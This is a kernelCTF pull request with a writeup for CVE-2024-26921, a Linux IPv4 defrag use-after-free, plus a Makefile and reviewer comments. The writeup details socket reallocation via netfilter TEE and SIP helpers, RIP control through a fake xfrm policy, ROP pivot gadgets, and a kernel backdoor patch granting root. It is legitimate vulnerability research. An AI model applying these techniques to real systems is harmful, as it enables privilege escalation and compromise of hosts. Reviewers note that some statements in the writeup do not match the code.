kernelCTF: add CVE-2024-26921_lts_cos #310
base: master
| Original file line number | Diff line number | Diff line change | ||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| @@ -0,0 +1,176 @@ | ||||||||||||||
| ## Overview | ||||||||||||||
|
|
||||||||||||||
| Let's look at what we need to perform the attack. | ||||||||||||||
|
|
||||||||||||||
| ### Socket to send the packet through | ||||||||||||||
|
|
||||||||||||||
| Different socket families have different handling of the routing and fragmentation issues. | ||||||||||||||
| We do not want to use upper layer protocols like TCP or UDP, because they perform their own fragmentation and we need to trigger fragmentation at the IP layer. | ||||||||||||||
|
|
||||||||||||||
| Second thing to consider is the kmalloc cache used to allocate struct sock. Most socket families have a dedicated cache, but some use a regular kmalloc(), giving us a simple way to reallocate the freed object without performing a cross-cache attack. | ||||||||||||||
|
|
||||||||||||||
| Finally, some sockets set the SOCK_RCU_FREE flag, which makes sk_destruct() wait for an RCU grace period before freeing the sock object. This would also make exploitation much harder. | ||||||||||||||
|
|
||||||||||||||
|
|
||||||||||||||
| The socket family that fulfills all those requirements is AF_PACKET (used for sending raw packets at layer 2). | ||||||||||||||
|
|
||||||||||||||
| This means we need to set our own layer 2 and layer 3 headers and choose an output device for the packet. | ||||||||||||||
| No routing is done; the packet goes straight to the output queue of the selected device. | ||||||||||||||
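To illustrate what "setting our own layer 2 and layer 3 headers" involves, here is a minimal sketch that assembles an Ethernet plus IPv4 frame in a user-space buffer. The helper names (`ip_checksum`, `build_frame`), the TTL, and the choice of UDP as the inner protocol are assumptions made for this example; they are not taken from the exploit source.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <arpa/inet.h>
#include <net/ethernet.h>
#include <netinet/ip.h>

/* RFC 1071 Internet checksum over an IPv4 header (len is always even). */
static uint16_t ip_checksum(const void *hdr, size_t len)
{
    const uint8_t *p = hdr;
    uint32_t sum = 0;

    for (size_t i = 0; i + 1 < len; i += 2)
        sum += (uint32_t)((p[i] << 8) | p[i + 1]);
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);
    return htons((uint16_t)~sum);
}

/*
 * Hypothetical helper: writes Ethernet header + IPv4 header + payload
 * into buf and returns the frame length. saddr/daddr are expected in
 * network byte order.
 */
static size_t build_frame(uint8_t *buf, size_t cap,
                          const uint8_t dst_mac[ETH_ALEN],
                          const uint8_t src_mac[ETH_ALEN],
                          uint32_t saddr, uint32_t daddr,
                          const void *payload, size_t payload_len)
{
    struct ether_header eth;
    struct iphdr ip;
    size_t total = sizeof(eth) + sizeof(ip) + payload_len;

    assert(total <= cap && sizeof(ip) + payload_len <= 0xffff);

    memcpy(eth.ether_dhost, dst_mac, ETH_ALEN);
    memcpy(eth.ether_shost, src_mac, ETH_ALEN);
    eth.ether_type = htons(ETHERTYPE_IP);

    memset(&ip, 0, sizeof(ip));
    ip.version = 4;
    ip.ihl = 5;                       /* 20-byte header, no options */
    ip.ttl = 64;                      /* assumed value */
    ip.protocol = IPPROTO_UDP;        /* assumed inner protocol */
    ip.tot_len = htons((uint16_t)(sizeof(ip) + payload_len));
    ip.saddr = saddr;
    ip.daddr = daddr;
    ip.check = ip_checksum(&ip, sizeof(ip));

    memcpy(buf, &eth, sizeof(eth));
    memcpy(buf + sizeof(eth), &ip, sizeof(ip));
    memcpy(buf + sizeof(eth) + sizeof(ip), payload, payload_len);
    return total;
}
```

The resulting buffer is what would be handed to send() on an AF_PACKET socket bound to the chosen interface. Opening such a socket needs CAP_NET_RAW, so that part is left out of the sketch.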
|
|
||||||||||||||
| ### Device driver to call ip_local_out() | ||||||||||||||
|
|
||||||||||||||
| Because we send our packets at layer 2, ip_send_skb() won't be called and we need to find another way to trigger ip_local_out(). | ||||||||||||||
|
|
||||||||||||||
| Fortunately, it is used by the IPvlan driver: | ||||||||||||||
| ``` | ||||||||||||||
| static int ipvlan_process_v4_outbound(struct sk_buff *skb) | ||||||||||||||
| { | ||||||||||||||
| ... | ||||||||||||||
| skb_dst_set(skb, &rt->dst); | ||||||||||||||
|
|
||||||||||||||
| memset(IPCB(skb), 0, sizeof(*IPCB(skb))); | ||||||||||||||
|
|
||||||||||||||
| err = ip_local_out(net, skb->sk, skb); | ||||||||||||||
| ... | ||||||||||||||
| ``` | ||||||||||||||
|
|
||||||||||||||
| So our packets will be sent out of the IPvlan interface. | ||||||||||||||
| IPvlan needs a master Ethernet device; we used a veth interface for that. | ||||||||||||||
|
|
||||||||||||||
|
|
||||||||||||||
| ### A way to close the socket fd before the ip_defrag() call | ||||||||||||||
|
|
||||||||||||||
| When our packet reaches ip_defrag(), the socket won't be freed if it is still referenced by the open file descriptor. | ||||||||||||||
|
|
||||||||||||||
| We can call close() only after sendmsg() returns. The syscall returns after the packet is enqueued to the output device, so we could try to win a race and close the fd in time, but there is a simpler way. | ||||||||||||||
|
|
||||||||||||||
| The sch_plug queuing discipline can be used to stop packets from being dequeued from a network device until an "unplug" command is received through the netlink API. | ||||||||||||||
|
|
||||||||||||||
|
|
||||||||||||||
| So the steps of our exploit are: | ||||||||||||||
| 1. "plug" the ipvlan interface | ||||||||||||||
| 2. Send a packet | ||||||||||||||
| 3. Close the socket | ||||||||||||||
| 4. "unplug" the ipvlan interface | ||||||||||||||
|
|
||||||||||||||
| These are actually all the steps needed to exploit the vulnerability, if we exclude the setup needed beforehand. | ||||||||||||||
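The ordering of these four steps can be sketched with a toy user-space model. This is not kernel code: `toy_sock`, `toy_skb`, and the `toy_*` helpers are made up for illustration, and a single counter stands in for the kernel's real socket lifetime accounting.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Toy stand-ins, not kernel types. */
struct toy_sock { int refs; bool freed; };
struct toy_skb  { struct toy_sock *sk; };

static void toy_sock_put(struct toy_sock *sk)
{
    assert(sk->refs > 0);
    if (--sk->refs == 0)
        sk->freed = true;   /* in the kernel the object returns to the slab */
}

/* Step 2: sending attaches the socket to the skb; the plugged qdisc holds the skb. */
static struct toy_skb toy_send(struct toy_sock *sk)
{
    sk->refs++;
    return (struct toy_skb){ .sk = sk };
}

/* Step 3: close() drops the reference held by the file descriptor. */
static void toy_close(struct toy_sock *sk)
{
    toy_sock_put(sk);
}

/*
 * Step 4: after the unplug, the hooks receive the sk pointer and then the
 * defrag path orphans the skb. The returned pointer is what later hooks
 * would still be using.
 */
static struct toy_sock *toy_unplug(struct toy_skb *skb)
{
    struct toy_sock *hook_sk = skb->sk;  /* handed to every hook */

    toy_sock_put(skb->sk);               /* models ip_defrag() orphaning the skb */
    skb->sk = NULL;
    return hook_sk;                      /* dangling once the sock is freed */
}
```

Starting from a socket with one reference (the open fd), running toy_send(), toy_close(), and toy_unplug() in that order leaves the hooks with a pointer to a freed object. If toy_close() is skipped, the fd reference keeps the object alive, which is why the socket has to be closed while the packet is still held by the plugged queue.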
|
|
||||||||||||||
| ### Network tools | ||||||||||||||
|
|
||||||||||||||
| The exploit needs external iptables and ip (from iproute2 package) binaries to set up rules and network interfaces. | ||||||||||||||
| These tools are not available in the current kernelCTF root image, so the tar archive with binaries and supporting libraries is attached to the exploit binary as a custom ELF section and extracted using objcopy during execution. | ||||||||||||||
|
|
||||||||||||||
| ## Triggering the IPv4 fragmentation | ||||||||||||||
|
|
||||||||||||||
|
Collaborator
So we introduced veth in the "Device driver" section; how is it connected with ipv0 and ipv1? What are ipv0 and ipv1? How do we set up those interfaces?
||||||||||||||
| The obvious idea is to set the MTU on the outgoing interface (ipv1) to a low value, but then our send() will just return a "Message too long" error. | ||||||||||||||
|
|
||||||||||||||
| Instead, we must reroute our packet to another interface with a low MTU (ipv0). This is done using a DNAT rule. | ||||||||||||||
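As a rough illustration of the arithmetic behind IPv4 fragmentation, the sketch below computes how many fragments a packet is split into for a given MTU. The function names and the example MTU values are assumptions for this example; the writeup does not state the MTU configured on ipv0.

```c
#include <assert.h>

/* Largest payload one fragment can carry: it must be a multiple of 8 bytes. */
static unsigned frag_payload_max(unsigned mtu, unsigned ihl)
{
    assert(mtu > ihl);
    return (mtu - ihl) & ~7u;
}

/*
 * Number of IPv4 fragments for a packet whose payload (everything after
 * the IP header) is payload_len bytes, sent over a link with the given MTU.
 */
static unsigned frag_count(unsigned payload_len, unsigned mtu, unsigned ihl)
{
    unsigned per = frag_payload_max(mtu, ihl);

    assert(per > 0);
    if (ihl + payload_len <= mtu)
        return 1;                      /* fits, no fragmentation */
    return (payload_len + per - 1) / per;
}
```

For example, a 1400-byte payload with a 20-byte header over an MTU of 576 gives 552 bytes per fragment and three fragments in total, while the same packet over an MTU of 1500 is not fragmented at all.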
|
Collaborator
So should we set a high MTU on ipv1? Does this give a bit more context?
||||||||||||||
|
|
||||||||||||||
|
Collaborator
Show
||||||||||||||
| ## Triggering ip_defrag() | ||||||||||||||
|
|
||||||||||||||
| Because we already have DNAT rules, the conntrack defrag hooks are installed and ip_defrag() will be called for each of our fragments, triggering the release of the sock object at the last fragment. | ||||||||||||||
|
Collaborator
Does this explain the situation correctly?
|
||||||||||||||
|
|
||||||||||||||
| ## Reallocating the victim object | ||||||||||||||
|
|
||||||||||||||
| To replace the victim object all we have to do is allocate from the kmalloc-2k cache on the same CPU. | ||||||||||||||
|
Collaborator
What structure do we consider the "victim object"? My guess
||||||||||||||
| This must be done before all the hooks finish, so there is no way to do it from user space. | ||||||||||||||
| However, we can use whatever netfilter modules we want. There's a lot of them and some are bound to make new allocations. | ||||||||||||||
| This line of thinking leads us to a TEE target: | ||||||||||||||
| > The TEE target will clone a packet and redirect this clone to another machine on the local network segment. | ||||||||||||||
|
|
||||||||||||||
| Cloning a packet sounds great, as it involves copying the data we passed to the send() function. | ||||||||||||||
| There is a problem, though. Our packet's data needs to be larger than 1024 bytes to be allocated from kmalloc-2k, and skb stores packets that large using a fragment list. When TEE clones the skb, pskb_copy() is called and only the space for the head is allocated with regular kmalloc; the rest is zero-copied by cloning the fraglist. | ||||||||||||||
|
Collaborator
What is a "fraglist"? What is "space for the head"? What structures are used?
||||||||||||||
|
|
||||||||||||||
| Fortunately, some netfilter modules need to look at the whole packet data in one piece (e.g. to search for patterns) instead of dealing with skb fragments. | ||||||||||||||
|
|
||||||||||||||
| One such example is the conntrack SIP helper. It calls skb_linearize(), which turns a fragmented skb into a linear one by allocating a kmalloc buffer for all the data and copying it there. This finally gives us a way to allocate from kmalloc-2k and overwrite the victim sock object with our data. | ||||||||||||||
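The size-class reasoning can be sketched as follows. This is a simplified model under stated assumptions: the general-purpose kmalloc size classes are the usual x86-64 ones, the linear buffer is sized as the cache-aligned data length plus a cache-aligned skb_shared_info, and `TOY_SHINFO_SIZE` (320 bytes) is an assumed value for that structure. The real reallocation path also accounts for existing headroom and extra slack, so the exact window of usable lengths depends on the kernel version.

```c
#include <assert.h>
#include <stddef.h>

#define TOY_SHINFO_SIZE 320u   /* assumed sizeof(struct skb_shared_info) */

/* Round up to a 64-byte boundary (assumed cache line size). */
static size_t toy_align(size_t n)
{
    return (n + 63) & ~(size_t)63;
}

/* Which general-purpose kmalloc cache would serve a request of this size. */
static size_t kmalloc_bucket(size_t size)
{
    static const size_t classes[] = {
        8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
    };

    assert(size > 0);
    for (size_t i = 0; i < sizeof(classes) / sizeof(classes[0]); i++)
        if (size <= classes[i])
            return classes[i];
    return 0;   /* larger requests are not served from these caches */
}

/* Simplified size of a linear skb head holding data_len bytes. */
static size_t toy_linear_head_size(size_t data_len)
{
    return toy_align(data_len) + toy_align(TOY_SHINFO_SIZE);
}
```

Under these assumptions a 1200-byte packet needs 1216 + 320 = 1536 bytes, which is served from kmalloc-2k, while anything above 1728 bytes of data would spill into kmalloc-4k.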
|
Collaborator
How exactly does skb_linearize() guarantee a kmalloc-2k hit? You mentioned the packet should be larger than 1024 bytes. Could you elaborate on the math here: how do we ensure that the newly linearized buffer lands squarely in kmalloc-2k?
||||||||||||||
|
|
||||||||||||||
| To summarize, by combining the TEE and SIP conntrack helper we are able to overwrite the victim sock object that will be used by the netfilter hooks. | ||||||||||||||
|
Collaborator
How exactly are the TEE target and SIP helper chained together? Please explicitly state the pipeline/iptables rule sequence.
||||||||||||||
|
|
||||||||||||||
| ## Getting RIP control | ||||||||||||||
|
|
||||||||||||||
| Controlling the struct sock object may seem like an instant win at first, but we soon discover that netfilter hooks rarely use the socket context and never call function pointers from that object. | ||||||||||||||
|
|
||||||||||||||
| The solution is the ip_route_me_harder() function which is called in the mangle table if some IPv4 parameters like src/dst address, TOS or mark change after mangle rules are executed: | ||||||||||||||
|
Collaborator
What specific iptables mangle rule do you use in the exploit?
||||||||||||||
|
|
||||||||||||||
| ``` | ||||||||||||||
| static unsigned int | ||||||||||||||
| ipt_mangle_out(void *priv, struct sk_buff *skb, const struct nf_hook_state *state) | ||||||||||||||
| { | ||||||||||||||
| ... | ||||||||||||||
| /* Save things which could affect route */ | ||||||||||||||
| mark = skb->mark; | ||||||||||||||
| iph = ip_hdr(skb); | ||||||||||||||
| saddr = iph->saddr; | ||||||||||||||
| daddr = iph->daddr; | ||||||||||||||
| tos = iph->tos; | ||||||||||||||
|
|
||||||||||||||
| ret = ipt_do_table(priv, skb, state); | ||||||||||||||
| /* Reroute for ANY change. */ | ||||||||||||||
| if (ret != NF_DROP && ret != NF_STOLEN) { | ||||||||||||||
| iph = ip_hdr(skb); | ||||||||||||||
|
|
||||||||||||||
| if (iph->saddr != saddr || | ||||||||||||||
| iph->daddr != daddr || | ||||||||||||||
| skb->mark != mark || | ||||||||||||||
| iph->tos != tos) { | ||||||||||||||
| err = ip_route_me_harder(state->net, state->sk, skb, RTN_UNSPEC); | ||||||||||||||
| ... | ||||||||||||||
| ``` | ||||||||||||||
|
|
||||||||||||||
| state->sk here is the pointer to our sock object. | ||||||||||||||
|
|
||||||||||||||
| ip_route_me_harder() calls xfrm_lookup() which examines sk->sk_policy and if the policy matches the current connection it eventually calls dst_alloc(). | ||||||||||||||
|
Collaborator
What is the exact function call chain from xfrm_lookup() to dst_alloc()?
||||||||||||||
| dst_alloc() calls the gc function pointer of the netns_xfrm.dst_ops struct and the netns_xfrm comes from the xfrm policy which is under our control. | ||||||||||||||
|
|
||||||||||||||
| So if we are able to craft a valid struct xfrm_policy that matches our connection, we will be able to get RIP control. | ||||||||||||||
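The primitive boils down to an indirect call through a structure we control. The toy model below mirrors only the first fields of struct dst_ops as we understand them (family, gc_thresh, gc); `toy_dst_ops`, `toy_dst_alloc`, and the `entries` field are simplifications made for this sketch, and the real check in dst_alloc() also depends on allocation flags and a per-CPU entry counter.

```c
#include <assert.h>
#include <stddef.h>

/* Simplified stand-in for the start of struct dst_ops. */
struct toy_dst_ops {
    unsigned short family;
    unsigned int   gc_thresh;
    int          (*gc)(struct toy_dst_ops *ops);
    long           entries;   /* stands in for the kernel's entry counter */
};

/* Models the garbage-collection check performed on allocation. */
static int toy_dst_alloc(struct toy_dst_ops *ops)
{
    assert(ops != NULL);
    if (ops->gc && ops->entries > (long)ops->gc_thresh)
        return ops->gc(ops);   /* indirect call with ops as first argument */
    return 0;
}

/* Hypothetical attacker-chosen target, used only to show the call happens. */
static int toy_hijacked;

static int toy_fake_gc(struct toy_dst_ops *ops)
{
    toy_hijacked = (ops != NULL);
    return 0;
}
```

If the fake object sets gc to an address of our choice and keeps gc_thresh below the entry count, the call is taken with a pointer to the fake dst_ops as the first argument. On x86-64 this layout puts gc at offset 8.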
|
|
||||||||||||||
| This policy is prepared in prepare_policy(). | ||||||||||||||
|
Collaborator
Please explain in detail how and which policy you prepare here in the writeup.
||||||||||||||
| The fake object for the sock itself is simple - we just need to set the sk_policy pointer and sk_mark value. | ||||||||||||||
|
Collaborator
How does sk->sk_mark play into this? Please elaborate.
||||||||||||||
|
|
||||||||||||||
| The policy object takes a lot of space and has pointers to other objects like netns_xfrm, so we used the [direct mapping storage technique](../../CVE-2024-26923_lts_cos/docs/novel-techniques.md) to place it at a known address in the kernel address space. | ||||||||||||||
|
|
||||||||||||||
| ## Pivot to ROP | ||||||||||||||
|
|
||||||||||||||
| When the gc pointer is called in dst_alloc(), the RDI register contains a pointer to dst_ops, which is part of our fake netns_xfrm object. | ||||||||||||||
|
|
||||||||||||||
| The following gadgets were used to pivot to the ROP chain placed at dst_ops + 0x10 (our gc pointer is at dst_ops + 0x08). | ||||||||||||||
|
|
||||||||||||||
| ``` | ||||||||||||||
| mov r8,QWORD PTR [rdi+0xc8] | ||||||||||||||
| mov eax,0x1 | ||||||||||||||
| test r8,r8 | ||||||||||||||
| je ffffffff82185d21 | ||||||||||||||
| mov rsi,rdi | ||||||||||||||
| mov rcx,r14 | ||||||||||||||
| mov rdi,rbp | ||||||||||||||
| mov rdx,r15 | ||||||||||||||
| call ffffffff82427a60 <__x86_indirect_thunk_r8> | ||||||||||||||
| ``` | ||||||||||||||
|
|
||||||||||||||
| This copies RDI to RSI and then calls the address loaded from [rdi+0xc8], which leads to: | ||||||||||||||
|
|
||||||||||||||
| ``` | ||||||||||||||
| push rsi | ||||||||||||||
| jmp qword ptr [rsi + 0x39] | ||||||||||||||
| ``` | ||||||||||||||
|
|
||||||||||||||
| and finally | ||||||||||||||
|
|
||||||||||||||
| ``` | ||||||||||||||
| pop rsp | ||||||||||||||
| pop rbp | ||||||||||||||
| pop rbx | ||||||||||||||
| ret | ||||||||||||||
| ``` | ||||||||||||||
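Putting the three gadgets together, the fake dst_ops needs pointers at specific offsets. The sketch below lays out such a buffer; the offsets come from the gadgets above, while the structure name, helper names, and gadget addresses are placeholders for illustration and not values from the exploit.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

enum {
    OFF_GC       = 0x08,   /* called by dst_alloc() with rdi = dst_ops   */
    OFF_ROP      = 0x10,   /* first qword consumed by the final "ret"    */
    OFF_JMP_SLOT = 0x39,   /* target of "jmp qword ptr [rsi + 0x39]"     */
    OFF_R8_SLOT  = 0xc8,   /* loaded into r8 and called by first gadget  */
    FAKE_OPS_LEN = 0xd0,
};

/* Placeholder gadget addresses; real values depend on the kernel build. */
struct toy_gadgets {
    uint64_t mov_rsi_rdi_call_r8;
    uint64_t push_rsi_jmp;
    uint64_t pop_rsp_rbp_rbx_ret;
    uint64_t first_rop_qword;
};

/* Store a 64-bit value at an arbitrary (possibly unaligned) offset. */
static void put64(uint8_t *buf, size_t off, uint64_t v)
{
    memcpy(buf + off, &v, sizeof(v));
}

static void build_fake_dst_ops(uint8_t buf[FAKE_OPS_LEN],
                               const struct toy_gadgets *g)
{
    assert(buf != NULL && g != NULL);
    memset(buf, 0, FAKE_OPS_LEN);
    put64(buf, OFF_GC, g->mov_rsi_rdi_call_r8);
    put64(buf, OFF_R8_SLOT, g->push_rsi_jmp);
    put64(buf, OFF_JMP_SLOT, g->pop_rsp_rbp_rbx_ret);
    put64(buf, OFF_ROP, g->first_rop_qword);
}
```

After the final gadget runs, RSP points at the fake dst_ops: the two pops consume offsets 0x00 and 0x08, and ret takes the qword at 0x10. In this layout the unaligned pointer at 0x39 overlaps the qwords at 0x38 and 0x40, so only a few chain entries fit before it.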
|
|
||||||||||||||
| ## Second pivot | ||||||||||||||
|
|
||||||||||||||
| To get more room for our ROP chain we move to a second location in the direct mapping using a simple pop rsp ; ret gadget. | ||||||||||||||
|
|
||||||||||||||
| ## Privilege escalation | ||||||||||||||
|
|
||||||||||||||
| Our ROP is executed from the ksoftirqd context, so we can't do a traditional commit_creds() to modify the current process's privileges. | ||||||||||||||
|
Collaborator
Since the ROP execution happens in ksoftirqd, it would be great to explicitly tie this back to the add_qdisc_plug unplug command in the text. A simple sentence explaining that unplugging the queue defers the packet processing to the softirq context perfectly bridges the gap.
||||||||||||||
|
|
||||||||||||||
| We could try locating our exploit process and changing its privileges, but we decided to go with a different approach - we patch the kernel creating a backdoor that will grant root privileges to any process that executes a given syscall. | ||||||||||||||
|
|
||||||||||||||
| We chose the rarely used kexec_file_load() syscall and overwrote its code with our get_root function, which does all the traditional privilege escalation and namespace escape work: commit_creds(init_cred), switch_task_namespaces(pid, init_nsproxy), etc. | ||||||||||||||
|
|
||||||||||||||
| This function also returns a special value (0x777) that our user space code can use to detect if the system was already compromised. | ||||||||||||||
|
Collaborator
The text mentions that get_root returns 0x777 for user-space to check. However, looking at the inline assembly for get_root and the syscall invocation in main(), this logic seems to have been removed from the code. You should probably delete this sentence from the writeup so readers aren't looking for code that isn't there.
||||||||||||||
|
|
||||||||||||||
| Patching the kernel function is done in rop_patch_kernel_code(): it calls set_memory_rw() on the destination memory and uses copy_user_generic() to write the new code there. | ||||||||||||||
|
Collaborator
The writeup mentions using copy_user_generic(), but your code actually stages the payload via xattrs into the direct mapping and uses memcpy().
||||||||||||||
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,65 @@ | ||
| ## Requirements to trigger the vulnerability | ||
|
|
||
| - CAP_NET_ADMIN in a namespace is required | ||
| - Kernel configuration: CONFIG_INET | ||
| - User namespaces required: Yes | ||
|
|
||
| ## Commit which introduced the vulnerability | ||
|
|
||
| https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7026b1ddb6b8d4e6ee33dc2bd06c0ca8746fa7ab | ||
|
|
||
| ## Commit which fixed the vulnerability | ||
|
|
||
| https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=18685451fc4e546fc0e718580d32df3c0e5c8272 | ||
|
|
||
| ## Affected kernel versions | ||
|
|
||
| Introduced in 4.1. Fixed in 6.6.25, 5.10.226 and other stable trees. | ||
|
|
||
| ## Affected component, subsystem | ||
|
|
||
| net/ipv4 | ||
|
|
||
| ## Description | ||
|
|
||
| ip_local_out() is the function responsible for sending locally generated IPv4 packets. | ||
| It calls the NF_INET_LOCAL_OUT netfilter hooks and eventually dst_output(). | ||
|
|
||
| The usual call to ip_local_out() looks like this: | ||
| ``` | ||
| int ip_send_skb(struct net *net, struct sk_buff *skb) | ||
| { | ||
| int err; | ||
|
|
||
| err = ip_local_out(net, skb->sk, skb); | ||
| if (err) { | ||
| if (err > 0) | ||
| err = net_xmit_errno(err); | ||
| if (err) | ||
| IP_INC_STATS(net, IPSTATS_MIB_OUTDISCARDS); | ||
| } | ||
|
|
||
| return err; | ||
| } | ||
| ``` | ||
|
|
||
| A pointer to the socket associated with the skb is passed as an argument to ip_local_out() and then to all the netfilter hooks: | ||
|
|
||
| ``` | ||
| int __ip_local_out(struct net *net, struct sock *sk, struct sk_buff *skb) | ||
| { | ||
| ... | ||
| return nf_hook(NFPROTO_IPV4, NF_INET_LOCAL_OUT, | ||
| net, sk, skb, NULL, skb_dst(skb)->dev, | ||
| dst_output); | ||
|
|
||
| } | ||
| ``` | ||
|
|
||
| skb holds a reference to a socket. Under normal conditions, the skb is released only after its output path is finished or once it has been received by the upper layers of the input stack (in scenarios where the outgoing packet is routed back to a local interface). | ||
| This ensures the associated socket is valid while the netfilter hooks are executing. | ||
|
|
||
| ip_defrag() is most often called in the input path, where it calls skb_orphan()/kfree_skb() on the fragment skb, assuming it is no longer needed. | ||
| However, ip_defrag() can also be called in the output path by the netfilter conntrack hook ipv4_conntrack_defrag(). | ||
|
|
||
| If that happens, the skb will be released, and if it holds the last reference to the socket, the socket will be released as well, causing a use-after-free when the next hooks are called and in ip_finish_output(). |
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,10 @@ | ||
| INCLUDES = -I/usr/include/libnl3 | ||
| LIBS = -L. -pthread -lnl-cli-3 -lnl-route-3 -lnl-3 -ldl | ||
| CFLAGS = -fomit-frame-pointer -static -fcf-protection=none | ||
|
|
||
| exploit: exploit.c kernelver_16919.450.26.h | ||
| gcc -o $@ exploit.c $(INCLUDES) $(CFLAGS) $(LIBS) | ||
| objcopy --add-section tools=tools.tar.gz $@ | ||
|
|
||
| prerequisites: | ||
| sudo apt-get install libnl-cli-3-dev libnl-route-3-dev |
Please add a bit of summary / "battle plan" type of paragraph. The reader would need the overview of what we're trying to do.
How about something like this: